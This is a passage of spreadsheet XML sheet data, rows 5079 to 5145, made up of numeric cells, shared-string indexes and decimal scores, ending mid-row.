    <row r="5079" ht="15.75" customHeight="1">
      <c r="A5079" s="1">
        <v>1328.0</v>
      </c>
      <c r="B5079" s="2">
        <v>2.5798362E7</v>
      </c>
      <c r="C5079" s="2" t="s">
        <v>4862</v>
      </c>
      <c r="D5079" s="2">
        <v>1.0</v>
      </c>
      <c r="E5079" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5079" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="5080" ht="15.75" customHeight="1">
      <c r="A5080" s="1">
        <v>3168.0</v>
      </c>
      <c r="B5080" s="2">
        <v>3.7031013E7</v>
      </c>
      <c r="C5080" s="2" t="s">
        <v>4863</v>
      </c>
      <c r="D5080" s="2">
        <v>1.0</v>
      </c>
      <c r="E5080" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5080" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="5081" ht="15.75" customHeight="1">
      <c r="A5081" s="1">
        <v>5157.0</v>
      </c>
      <c r="B5081" s="2">
        <v>4.4740589E7</v>
      </c>
      <c r="C5081" s="2" t="s">
        <v>4864</v>
      </c>
      <c r="D5081" s="2">
        <v>1.0</v>
      </c>
      <c r="E5081" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5081" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="5082" ht="15.75" customHeight="1">
      <c r="A5082" s="1">
        <v>5815.0</v>
      </c>
      <c r="B5082" s="2">
        <v>4.6842767E7</v>
      </c>
      <c r="C5082" s="2" t="s">
        <v>4865</v>
      </c>
      <c r="D5082" s="2">
        <v>1.0</v>
      </c>
      <c r="E5082" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5082" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="5083" ht="15.75" customHeight="1">
      <c r="A5083" s="1">
        <v>6045.0</v>
      </c>
      <c r="B5083" s="2">
        <v>4.7601411E7</v>
      </c>
      <c r="C5083" s="2" t="s">
        <v>4866</v>
      </c>
      <c r="D5083" s="2">
        <v>1.0</v>
      </c>
      <c r="E5083" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5083" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="5084" ht="15.75" customHeight="1">
      <c r="A5084" s="1">
        <v>9873.0</v>
      </c>
      <c r="B5084" s="2">
        <v>5.6729127E7</v>
      </c>
      <c r="C5084" s="2" t="s">
        <v>4867</v>
      </c>
      <c r="D5084" s="2">
        <v>1.0</v>
      </c>
      <c r="E5084" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5084" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="5085" ht="15.75" customHeight="1">
      <c r="A5085" s="1">
        <v>12681.0</v>
      </c>
      <c r="B5085" s="2">
        <v>3.0625967E7</v>
      </c>
      <c r="C5085" s="2" t="s">
        <v>4868</v>
      </c>
      <c r="D5085" s="2">
        <v>1.0</v>
      </c>
      <c r="E5085" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5085" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="5086" ht="15.75" customHeight="1">
      <c r="A5086" s="1">
        <v>13477.0</v>
      </c>
      <c r="B5086" s="2">
        <v>3.530774E7</v>
      </c>
      <c r="C5086" s="2" t="s">
        <v>4869</v>
      </c>
      <c r="D5086" s="2">
        <v>1.0</v>
      </c>
      <c r="E5086" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5086" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="5087" ht="15.75" customHeight="1">
      <c r="A5087" s="1">
        <v>14318.0</v>
      </c>
      <c r="B5087" s="2">
        <v>3.8679554E7</v>
      </c>
      <c r="C5087" s="2" t="s">
        <v>4870</v>
      </c>
      <c r="D5087" s="2">
        <v>1.0</v>
      </c>
      <c r="E5087" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5087" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="5088" ht="15.75" customHeight="1">
      <c r="A5088" s="1">
        <v>14709.0</v>
      </c>
      <c r="B5088" s="2">
        <v>4.0618379E7</v>
      </c>
      <c r="C5088" s="2" t="s">
        <v>4871</v>
      </c>
      <c r="D5088" s="2">
        <v>1.0</v>
      </c>
      <c r="E5088" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5088" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="5089" ht="15.75" customHeight="1">
      <c r="A5089" s="1">
        <v>14912.0</v>
      </c>
      <c r="B5089" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C5089" s="2" t="s">
        <v>4872</v>
      </c>
      <c r="D5089" s="2">
        <v>1.0</v>
      </c>
      <c r="E5089" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5089" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="5090" ht="15.75" customHeight="1">
      <c r="A5090" s="1">
        <v>15371.0</v>
      </c>
      <c r="B5090" s="2">
        <v>4.2730519E7</v>
      </c>
      <c r="C5090" s="2" t="s">
        <v>4873</v>
      </c>
      <c r="D5090" s="2">
        <v>1.0</v>
      </c>
      <c r="E5090" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5090" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="5091" ht="15.75" customHeight="1">
      <c r="A5091" s="1">
        <v>19670.0</v>
      </c>
      <c r="B5091" s="2">
        <v>5.6388719E7</v>
      </c>
      <c r="C5091" s="2" t="s">
        <v>4874</v>
      </c>
      <c r="D5091" s="2">
        <v>1.0</v>
      </c>
      <c r="E5091" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5091" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="5092" ht="15.75" customHeight="1">
      <c r="A5092" s="1">
        <v>21901.0</v>
      </c>
      <c r="B5092" s="2">
        <v>2.7908082E7</v>
      </c>
      <c r="C5092" s="2" t="s">
        <v>4875</v>
      </c>
      <c r="D5092" s="2">
        <v>1.0</v>
      </c>
      <c r="E5092" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5092" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="5093" ht="15.75" customHeight="1">
      <c r="A5093" s="1">
        <v>30479.0</v>
      </c>
      <c r="B5093" s="2">
        <v>3.970866E7</v>
      </c>
      <c r="C5093" s="2" t="s">
        <v>4876</v>
      </c>
      <c r="D5093" s="2">
        <v>1.0</v>
      </c>
      <c r="E5093" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F5093" s="2">
        <v>0.09259259259259257</v>
      </c>
    </row>
    <row r="5094" ht="15.75" customHeight="1">
      <c r="A5094" s="1">
        <v>27280.0</v>
      </c>
      <c r="B5094" s="2">
        <v>2.1229056E7</v>
      </c>
      <c r="C5094" s="2" t="s">
        <v>4877</v>
      </c>
      <c r="D5094" s="2">
        <v>1.0</v>
      </c>
      <c r="E5094" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5094" s="2">
        <v>0.450815494393476</v>
      </c>
    </row>
    <row r="5095" ht="15.75" customHeight="1">
      <c r="A5095" s="1">
        <v>29354.0</v>
      </c>
      <c r="B5095" s="2">
        <v>3.1554798E7</v>
      </c>
      <c r="C5095" s="2" t="s">
        <v>4879</v>
      </c>
      <c r="D5095" s="2">
        <v>1.0</v>
      </c>
      <c r="E5095" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5095" s="2">
        <v>0.4350756081525311</v>
      </c>
    </row>
    <row r="5096" ht="15.75" customHeight="1">
      <c r="A5096" s="1">
        <v>29350.0</v>
      </c>
      <c r="B5096" s="2">
        <v>3.1513277E7</v>
      </c>
      <c r="C5096" s="2" t="s">
        <v>4880</v>
      </c>
      <c r="D5096" s="2">
        <v>1.0</v>
      </c>
      <c r="E5096" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5096" s="2">
        <v>0.3463718820861678</v>
      </c>
    </row>
    <row r="5097" ht="15.75" customHeight="1">
      <c r="A5097" s="1">
        <v>30727.0</v>
      </c>
      <c r="B5097" s="2">
        <v>4.371393E7</v>
      </c>
      <c r="C5097" s="2" t="s">
        <v>4881</v>
      </c>
      <c r="D5097" s="2">
        <v>1.0</v>
      </c>
      <c r="E5097" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5097" s="2">
        <v>0.2973856209150326</v>
      </c>
    </row>
    <row r="5098" ht="15.75" customHeight="1">
      <c r="A5098" s="1">
        <v>30859.0</v>
      </c>
      <c r="B5098" s="2">
        <v>4.6177354E7</v>
      </c>
      <c r="C5098" s="2" t="s">
        <v>4882</v>
      </c>
      <c r="D5098" s="2">
        <v>1.0</v>
      </c>
      <c r="E5098" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5098" s="2">
        <v>0.2857815442561205</v>
      </c>
    </row>
    <row r="5099" ht="15.75" customHeight="1">
      <c r="A5099" s="1">
        <v>29963.0</v>
      </c>
      <c r="B5099" s="2">
        <v>3607767.0</v>
      </c>
      <c r="C5099" s="2" t="s">
        <v>4883</v>
      </c>
      <c r="D5099" s="2">
        <v>1.0</v>
      </c>
      <c r="E5099" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5099" s="2">
        <v>0.2649051490514905</v>
      </c>
    </row>
    <row r="5100" ht="15.75" customHeight="1">
      <c r="A5100" s="1">
        <v>27977.0</v>
      </c>
      <c r="B5100" s="2">
        <v>2.4005594E7</v>
      </c>
      <c r="C5100" s="2" t="s">
        <v>4884</v>
      </c>
      <c r="D5100" s="2">
        <v>1.0</v>
      </c>
      <c r="E5100" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5100" s="2">
        <v>0.2595129375951294</v>
      </c>
    </row>
    <row r="5101" ht="15.75" customHeight="1">
      <c r="A5101" s="1">
        <v>30591.0</v>
      </c>
      <c r="B5101" s="2">
        <v>4.1199834E7</v>
      </c>
      <c r="C5101" s="2" t="s">
        <v>4885</v>
      </c>
      <c r="D5101" s="2">
        <v>1.0</v>
      </c>
      <c r="E5101" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5101" s="2">
        <v>0.2590511860174781</v>
      </c>
    </row>
    <row r="5102" ht="15.75" customHeight="1">
      <c r="A5102" s="1">
        <v>24730.0</v>
      </c>
      <c r="B5102" s="2">
        <v>1.1739053E7</v>
      </c>
      <c r="C5102" s="2" t="s">
        <v>4886</v>
      </c>
      <c r="D5102" s="2">
        <v>1.0</v>
      </c>
      <c r="E5102" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5102" s="2">
        <v>0.2526041666666667</v>
      </c>
    </row>
    <row r="5103" ht="15.75" customHeight="1">
      <c r="A5103" s="1">
        <v>32661.0</v>
      </c>
      <c r="B5103" s="2">
        <v>5914198.0</v>
      </c>
      <c r="C5103" s="2" t="s">
        <v>4887</v>
      </c>
      <c r="D5103" s="2">
        <v>1.0</v>
      </c>
      <c r="E5103" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5103" s="2">
        <v>0.2524752475247525</v>
      </c>
    </row>
    <row r="5104" ht="15.75" customHeight="1">
      <c r="A5104" s="1">
        <v>34052.0</v>
      </c>
      <c r="B5104" s="2">
        <v>9595466.0</v>
      </c>
      <c r="C5104" s="2" t="s">
        <v>4888</v>
      </c>
      <c r="D5104" s="2">
        <v>1.0</v>
      </c>
      <c r="E5104" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5104" s="2">
        <v>0.2414529914529914</v>
      </c>
    </row>
    <row r="5105" ht="15.75" customHeight="1">
      <c r="A5105" s="1">
        <v>32737.0</v>
      </c>
      <c r="B5105" s="2">
        <v>6020591.0</v>
      </c>
      <c r="C5105" s="2" t="s">
        <v>4889</v>
      </c>
      <c r="D5105" s="2">
        <v>1.0</v>
      </c>
      <c r="E5105" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5105" s="2">
        <v>0.2404921700223713</v>
      </c>
    </row>
    <row r="5106" ht="15.75" customHeight="1">
      <c r="A5106" s="1">
        <v>28890.0</v>
      </c>
      <c r="B5106" s="2">
        <v>2.9275515E7</v>
      </c>
      <c r="C5106" s="2" t="s">
        <v>4890</v>
      </c>
      <c r="D5106" s="2">
        <v>1.0</v>
      </c>
      <c r="E5106" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5106" s="2">
        <v>0.2392676767676768</v>
      </c>
    </row>
    <row r="5107" ht="15.75" customHeight="1">
      <c r="A5107" s="1">
        <v>31985.0</v>
      </c>
      <c r="B5107" s="2">
        <v>5327347.0</v>
      </c>
      <c r="C5107" s="2" t="s">
        <v>4891</v>
      </c>
      <c r="D5107" s="2">
        <v>1.0</v>
      </c>
      <c r="E5107" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5107" s="2">
        <v>0.2385265700483091</v>
      </c>
    </row>
    <row r="5108" ht="15.75" customHeight="1">
      <c r="A5108" s="1">
        <v>30926.0</v>
      </c>
      <c r="B5108" s="2">
        <v>4.7021887E7</v>
      </c>
      <c r="C5108" s="2" t="s">
        <v>4892</v>
      </c>
      <c r="D5108" s="2">
        <v>1.0</v>
      </c>
      <c r="E5108" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5108" s="2">
        <v>0.2359307359307359</v>
      </c>
    </row>
    <row r="5109" ht="15.75" customHeight="1">
      <c r="A5109" s="1">
        <v>27457.0</v>
      </c>
      <c r="B5109" s="2">
        <v>2.1985173E7</v>
      </c>
      <c r="C5109" s="2" t="s">
        <v>4893</v>
      </c>
      <c r="D5109" s="2">
        <v>1.0</v>
      </c>
      <c r="E5109" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5109" s="2">
        <v>0.2355836849507735</v>
      </c>
    </row>
    <row r="5110" ht="15.75" customHeight="1">
      <c r="A5110" s="1">
        <v>27809.0</v>
      </c>
      <c r="B5110" s="2">
        <v>2.32935E7</v>
      </c>
      <c r="C5110" s="2" t="s">
        <v>4893</v>
      </c>
      <c r="D5110" s="2">
        <v>1.0</v>
      </c>
      <c r="E5110" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5110" s="2">
        <v>0.2355836849507735</v>
      </c>
    </row>
    <row r="5111" ht="15.75" customHeight="1">
      <c r="A5111" s="1">
        <v>29290.0</v>
      </c>
      <c r="B5111" s="2">
        <v>3.1141427E7</v>
      </c>
      <c r="C5111" s="2" t="s">
        <v>4894</v>
      </c>
      <c r="D5111" s="2">
        <v>1.0</v>
      </c>
      <c r="E5111" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5111" s="2">
        <v>0.2353395061728395</v>
      </c>
    </row>
    <row r="5112" ht="15.75" customHeight="1">
      <c r="A5112" s="1">
        <v>29291.0</v>
      </c>
      <c r="B5112" s="2">
        <v>3.1145804E7</v>
      </c>
      <c r="C5112" s="2" t="s">
        <v>4895</v>
      </c>
      <c r="D5112" s="2">
        <v>1.0</v>
      </c>
      <c r="E5112" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5112" s="2">
        <v>0.234640522875817</v>
      </c>
    </row>
    <row r="5113" ht="15.75" customHeight="1">
      <c r="A5113" s="1">
        <v>30764.0</v>
      </c>
      <c r="B5113" s="2">
        <v>4.4359936E7</v>
      </c>
      <c r="C5113" s="2" t="s">
        <v>4896</v>
      </c>
      <c r="D5113" s="2">
        <v>1.0</v>
      </c>
      <c r="E5113" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5113" s="2">
        <v>0.2304804804804805</v>
      </c>
    </row>
    <row r="5114" ht="15.75" customHeight="1">
      <c r="A5114" s="1">
        <v>28388.0</v>
      </c>
      <c r="B5114" s="2">
        <v>2.6133645E7</v>
      </c>
      <c r="C5114" s="2" t="s">
        <v>4897</v>
      </c>
      <c r="D5114" s="2">
        <v>1.0</v>
      </c>
      <c r="E5114" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5114" s="2">
        <v>0.2299578059071729</v>
      </c>
    </row>
    <row r="5115" ht="15.75" customHeight="1">
      <c r="A5115" s="1">
        <v>33937.0</v>
      </c>
      <c r="B5115" s="2">
        <v>9288435.0</v>
      </c>
      <c r="C5115" s="2" t="s">
        <v>4898</v>
      </c>
      <c r="D5115" s="2">
        <v>1.0</v>
      </c>
      <c r="E5115" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5115" s="2">
        <v>0.2272079772079772</v>
      </c>
    </row>
    <row r="5116" ht="15.75" customHeight="1">
      <c r="A5116" s="1">
        <v>33619.0</v>
      </c>
      <c r="B5116" s="2">
        <v>8344577.0</v>
      </c>
      <c r="C5116" s="2" t="s">
        <v>4899</v>
      </c>
      <c r="D5116" s="2">
        <v>1.0</v>
      </c>
      <c r="E5116" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5116" s="2">
        <v>0.2269841269841269</v>
      </c>
    </row>
    <row r="5117" ht="15.75" customHeight="1">
      <c r="A5117" s="1">
        <v>30851.0</v>
      </c>
      <c r="B5117" s="2">
        <v>4.5974292E7</v>
      </c>
      <c r="C5117" s="2" t="s">
        <v>4900</v>
      </c>
      <c r="D5117" s="2">
        <v>1.0</v>
      </c>
      <c r="E5117" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5117" s="2">
        <v>0.2269647696476965</v>
      </c>
    </row>
    <row r="5118" ht="15.75" customHeight="1">
      <c r="A5118" s="1">
        <v>31277.0</v>
      </c>
      <c r="B5118" s="2">
        <v>4954109.0</v>
      </c>
      <c r="C5118" s="2" t="s">
        <v>4901</v>
      </c>
      <c r="D5118" s="2">
        <v>1.0</v>
      </c>
      <c r="E5118" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5118" s="2">
        <v>0.2259259259259259</v>
      </c>
    </row>
    <row r="5119" ht="15.75" customHeight="1">
      <c r="A5119" s="1">
        <v>30557.0</v>
      </c>
      <c r="B5119" s="2">
        <v>4.0759827E7</v>
      </c>
      <c r="C5119" s="2" t="s">
        <v>4902</v>
      </c>
      <c r="D5119" s="2">
        <v>1.0</v>
      </c>
      <c r="E5119" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5119" s="2">
        <v>0.2230639730639731</v>
      </c>
    </row>
    <row r="5120" ht="15.75" customHeight="1">
      <c r="A5120" s="1">
        <v>33721.0</v>
      </c>
      <c r="B5120" s="2">
        <v>8515202.0</v>
      </c>
      <c r="C5120" s="2" t="s">
        <v>4903</v>
      </c>
      <c r="D5120" s="2">
        <v>1.0</v>
      </c>
      <c r="E5120" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5120" s="2">
        <v>0.2215189873417721</v>
      </c>
    </row>
    <row r="5121" ht="15.75" customHeight="1">
      <c r="A5121" s="1">
        <v>30930.0</v>
      </c>
      <c r="B5121" s="2">
        <v>4.7074111E7</v>
      </c>
      <c r="C5121" s="2" t="s">
        <v>4904</v>
      </c>
      <c r="D5121" s="2">
        <v>1.0</v>
      </c>
      <c r="E5121" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5121" s="2">
        <v>0.2201646090534979</v>
      </c>
    </row>
    <row r="5122" ht="15.75" customHeight="1">
      <c r="A5122" s="1">
        <v>26339.0</v>
      </c>
      <c r="B5122" s="2">
        <v>1.6756899E7</v>
      </c>
      <c r="C5122" s="2" t="s">
        <v>4905</v>
      </c>
      <c r="D5122" s="2">
        <v>1.0</v>
      </c>
      <c r="E5122" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5122" s="2">
        <v>0.2196581196581197</v>
      </c>
    </row>
    <row r="5123" ht="15.75" customHeight="1">
      <c r="A5123" s="1">
        <v>34049.0</v>
      </c>
      <c r="B5123" s="2">
        <v>9580980.0</v>
      </c>
      <c r="C5123" s="2" t="s">
        <v>4906</v>
      </c>
      <c r="D5123" s="2">
        <v>1.0</v>
      </c>
      <c r="E5123" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5123" s="2">
        <v>0.219626168224299</v>
      </c>
    </row>
    <row r="5124" ht="15.75" customHeight="1">
      <c r="A5124" s="1">
        <v>31997.0</v>
      </c>
      <c r="B5124" s="2">
        <v>5332654.0</v>
      </c>
      <c r="C5124" s="2" t="s">
        <v>4907</v>
      </c>
      <c r="D5124" s="2">
        <v>1.0</v>
      </c>
      <c r="E5124" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5124" s="2">
        <v>0.2182539682539683</v>
      </c>
    </row>
    <row r="5125" ht="15.75" customHeight="1">
      <c r="A5125" s="1">
        <v>31287.0</v>
      </c>
      <c r="B5125" s="2">
        <v>4962052.0</v>
      </c>
      <c r="C5125" s="2" t="s">
        <v>4908</v>
      </c>
      <c r="D5125" s="2">
        <v>1.0</v>
      </c>
      <c r="E5125" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5125" s="2">
        <v>0.2181964573268921</v>
      </c>
    </row>
    <row r="5126" ht="15.75" customHeight="1">
      <c r="A5126" s="1">
        <v>24011.0</v>
      </c>
      <c r="B5126" s="2">
        <v>9288436.0</v>
      </c>
      <c r="C5126" s="2" t="s">
        <v>4909</v>
      </c>
      <c r="D5126" s="2">
        <v>1.0</v>
      </c>
      <c r="E5126" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5126" s="2">
        <v>0.217948717948718</v>
      </c>
    </row>
    <row r="5127" ht="15.75" customHeight="1">
      <c r="A5127" s="1">
        <v>33936.0</v>
      </c>
      <c r="B5127" s="2">
        <v>9288435.0</v>
      </c>
      <c r="C5127" s="2" t="s">
        <v>4909</v>
      </c>
      <c r="D5127" s="2">
        <v>1.0</v>
      </c>
      <c r="E5127" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5127" s="2">
        <v>0.217948717948718</v>
      </c>
    </row>
    <row r="5128" ht="15.75" customHeight="1">
      <c r="A5128" s="1">
        <v>26563.0</v>
      </c>
      <c r="B5128" s="2">
        <v>1.7840239E7</v>
      </c>
      <c r="C5128" s="2" t="s">
        <v>4910</v>
      </c>
      <c r="D5128" s="2">
        <v>1.0</v>
      </c>
      <c r="E5128" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5128" s="2">
        <v>0.2176799440950384</v>
      </c>
    </row>
    <row r="5129" ht="15.75" customHeight="1">
      <c r="A5129" s="1">
        <v>29303.0</v>
      </c>
      <c r="B5129" s="2">
        <v>3.1259644E7</v>
      </c>
      <c r="C5129" s="2" t="s">
        <v>4911</v>
      </c>
      <c r="D5129" s="2">
        <v>1.0</v>
      </c>
      <c r="E5129" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5129" s="2">
        <v>0.2176350662589194</v>
      </c>
    </row>
    <row r="5130" ht="15.75" customHeight="1">
      <c r="A5130" s="1">
        <v>29793.0</v>
      </c>
      <c r="B5130" s="2">
        <v>3.510323E7</v>
      </c>
      <c r="C5130" s="2" t="s">
        <v>4912</v>
      </c>
      <c r="D5130" s="2">
        <v>1.0</v>
      </c>
      <c r="E5130" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5130" s="2">
        <v>0.216820987654321</v>
      </c>
    </row>
    <row r="5131" ht="15.75" customHeight="1">
      <c r="A5131" s="1">
        <v>22923.0</v>
      </c>
      <c r="B5131" s="2">
        <v>4.8412613E7</v>
      </c>
      <c r="C5131" s="2" t="s">
        <v>4913</v>
      </c>
      <c r="D5131" s="2">
        <v>1.0</v>
      </c>
      <c r="E5131" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5131" s="2">
        <v>0.2142857142857144</v>
      </c>
    </row>
    <row r="5132" ht="15.75" customHeight="1">
      <c r="A5132" s="1">
        <v>20835.0</v>
      </c>
      <c r="B5132" s="2">
        <v>1.5546643E7</v>
      </c>
      <c r="C5132" s="2" t="s">
        <v>4914</v>
      </c>
      <c r="D5132" s="2">
        <v>1.0</v>
      </c>
      <c r="E5132" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5132" s="2">
        <v>0.2140255009107468</v>
      </c>
    </row>
    <row r="5133" ht="15.75" customHeight="1">
      <c r="A5133" s="1">
        <v>29460.0</v>
      </c>
      <c r="B5133" s="2">
        <v>3.2308905E7</v>
      </c>
      <c r="C5133" s="2" t="s">
        <v>4915</v>
      </c>
      <c r="D5133" s="2">
        <v>1.0</v>
      </c>
      <c r="E5133" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5133" s="2">
        <v>0.2123655913978495</v>
      </c>
    </row>
    <row r="5134" ht="15.75" customHeight="1">
      <c r="A5134" s="1">
        <v>30901.0</v>
      </c>
      <c r="B5134" s="2">
        <v>4.6686951E7</v>
      </c>
      <c r="C5134" s="2" t="s">
        <v>4916</v>
      </c>
      <c r="D5134" s="2">
        <v>1.0</v>
      </c>
      <c r="E5134" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5134" s="2">
        <v>0.2123287671232877</v>
      </c>
    </row>
    <row r="5135" ht="15.75" customHeight="1">
      <c r="A5135" s="1">
        <v>23571.0</v>
      </c>
      <c r="B5135" s="2">
        <v>6209634.0</v>
      </c>
      <c r="C5135" s="2" t="s">
        <v>4914</v>
      </c>
      <c r="D5135" s="2">
        <v>1.0</v>
      </c>
      <c r="E5135" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5135" s="2">
        <v>0.2122040072859745</v>
      </c>
    </row>
    <row r="5136" ht="15.75" customHeight="1">
      <c r="A5136" s="1">
        <v>27421.0</v>
      </c>
      <c r="B5136" s="2">
        <v>2.1876713E7</v>
      </c>
      <c r="C5136" s="2" t="s">
        <v>4917</v>
      </c>
      <c r="D5136" s="2">
        <v>1.0</v>
      </c>
      <c r="E5136" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5136" s="2">
        <v>0.2114427860696518</v>
      </c>
    </row>
    <row r="5137" ht="15.75" customHeight="1">
      <c r="A5137" s="1">
        <v>32466.0</v>
      </c>
      <c r="B5137" s="2">
        <v>5.6787277E7</v>
      </c>
      <c r="C5137" s="2" t="s">
        <v>4918</v>
      </c>
      <c r="D5137" s="2">
        <v>1.0</v>
      </c>
      <c r="E5137" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5137" s="2">
        <v>0.2107046070460704</v>
      </c>
    </row>
    <row r="5138" ht="15.75" customHeight="1">
      <c r="A5138" s="1">
        <v>33325.0</v>
      </c>
      <c r="B5138" s="2">
        <v>7551925.0</v>
      </c>
      <c r="C5138" s="2" t="s">
        <v>4919</v>
      </c>
      <c r="D5138" s="2">
        <v>1.0</v>
      </c>
      <c r="E5138" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5138" s="2">
        <v>0.20995670995671</v>
      </c>
    </row>
    <row r="5139" ht="15.75" customHeight="1">
      <c r="A5139" s="1">
        <v>29070.0</v>
      </c>
      <c r="B5139" s="2">
        <v>3.0320592E7</v>
      </c>
      <c r="C5139" s="2" t="s">
        <v>4920</v>
      </c>
      <c r="D5139" s="2">
        <v>1.0</v>
      </c>
      <c r="E5139" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5139" s="2">
        <v>0.2099567099567099</v>
      </c>
    </row>
    <row r="5140" ht="15.75" customHeight="1">
      <c r="A5140" s="1">
        <v>33437.0</v>
      </c>
      <c r="B5140" s="2">
        <v>7820280.0</v>
      </c>
      <c r="C5140" s="2" t="s">
        <v>4921</v>
      </c>
      <c r="D5140" s="2">
        <v>1.0</v>
      </c>
      <c r="E5140" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5140" s="2">
        <v>0.2097844112769486</v>
      </c>
    </row>
    <row r="5141" ht="15.75" customHeight="1">
      <c r="A5141" s="1">
        <v>25902.0</v>
      </c>
      <c r="B5141" s="2">
        <v>1.5050846E7</v>
      </c>
      <c r="C5141" s="2" t="s">
        <v>4922</v>
      </c>
      <c r="D5141" s="2">
        <v>1.0</v>
      </c>
      <c r="E5141" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5141" s="2">
        <v>0.2095959595959596</v>
      </c>
    </row>
    <row r="5142" ht="15.75" customHeight="1">
      <c r="A5142" s="1">
        <v>32475.0</v>
      </c>
      <c r="B5142" s="2">
        <v>5.6903658E7</v>
      </c>
      <c r="C5142" s="2" t="s">
        <v>4923</v>
      </c>
      <c r="D5142" s="2">
        <v>1.0</v>
      </c>
      <c r="E5142" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5142" s="2">
        <v>0.209480122324159</v>
      </c>
    </row>
    <row r="5143" ht="15.75" customHeight="1">
      <c r="A5143" s="1">
        <v>29288.0</v>
      </c>
      <c r="B5143" s="2">
        <v>3.1086011E7</v>
      </c>
      <c r="C5143" s="2" t="s">
        <v>4924</v>
      </c>
      <c r="D5143" s="2">
        <v>1.0</v>
      </c>
      <c r="E5143" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5143" s="2">
        <v>0.2083333333333333</v>
      </c>
    </row>
    <row r="5144" ht="15.75" customHeight="1">
      <c r="A5144" s="1">
        <v>28147.0</v>
      </c>
      <c r="B5144" s="2">
        <v>2.481959E7</v>
      </c>
      <c r="C5144" s="2" t="s">
        <v>4925</v>
      </c>
      <c r="D5144" s="2">
        <v>1.0</v>
      </c>
      <c r="E5144" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5144" s="2">
        <v>0.2072879330943847</v>
      </c>
    </row>
    <row r="5145" ht="15.75" customHeight="1">
      <c r="A5145" s="1">
        <v>27687.0</v>
      </c>
      <c r="B5145" s="2">
        <v>2.2973575E7</v>
      </c>
      <c r="C5145" s="2" t="s">
        <v>4926</v>
      </c>
      <c r="D5145" s="2">
        <v>1.0</v>
      </c>
      <c r="E5145" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5145" s="2">
        <v>0.2061266874350987</v>
      </c>
    </row>
    <row r="5146" ht="15.75" customHeight="1">
      <c r="A5146" s="1">
